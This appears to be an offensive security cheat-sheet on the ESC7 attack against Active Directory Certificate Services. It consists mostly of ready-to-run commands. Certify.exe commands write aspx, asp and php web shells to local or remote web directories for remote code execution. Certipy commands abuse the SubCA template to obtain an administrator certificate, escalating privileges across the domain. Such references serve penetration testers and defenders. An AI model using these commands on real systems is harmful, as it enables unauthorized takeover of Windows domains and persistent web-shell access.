Active Directory - Certificate ESC7
ESC7 - Vulnerable Certificate Authority Access Control
Exploitation
-
Detect CAs that allow low privileged users the
ManageCA
orManage Certificates
permissions -
Change the CA settings to enable the SAN extension for all the templates under the vulnerable CA (ESC6)
-
Request the certificate with the desired SAN.
-
Grant approval if required or disable the approval requirement
Exploitation 2:
Alternative exploitation from ManageCA to RCE on ADCS server:
# Get the current CDP list. Useful to find remote writable shares:
Certify.exe writefile /ca:SERVER\ca-name /readonly
# Write an aspx shell to a local web directory:
Certify.exe writefile /ca:SERVER\ca-name /path:C:\Windows\SystemData\CES\CA-Name\shell.aspx /input:C:\Local\Path\shell.aspx
# Write the default asp shell to a local web directory:
Certify.exe writefile /ca:SERVER\ca-name /path:c:\inetpub\wwwroot\shell.asp
# Write a php shell to a remote web directory:
Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /input:C:\Local\path\shell.php
Exploitation 3:
# enable SubCA template
certipy ca -ca 'DOMAIN-CA' -enable-template 'SubCA' -username user@domain.local -p password -dc-ip 10.10.10.10 -target-ip 10.10.10.11
# request a certificate based on subCA template
certipy req -ca 'DOMAIN-CA' -username user@domain.local -p password -dc-ip 10.10.10.10 -target-ip 10.10.10.11 -template SubCA -upn administrator@domain.local
# issue failed certificate request
certipy ca -ca 'DOMAIN-CA' -issue-request 7 -username user@domain.local -p password -dc-ip 10.10.10.10 -target-ip 10.10.10.11
# retrieve the issued certificate
certipy req -ca 'DOMAIN-CA' -username user@domain.local -p password -dc-ip 10.10.10.10 -target-ip 10.10.10.11 -retrieve 7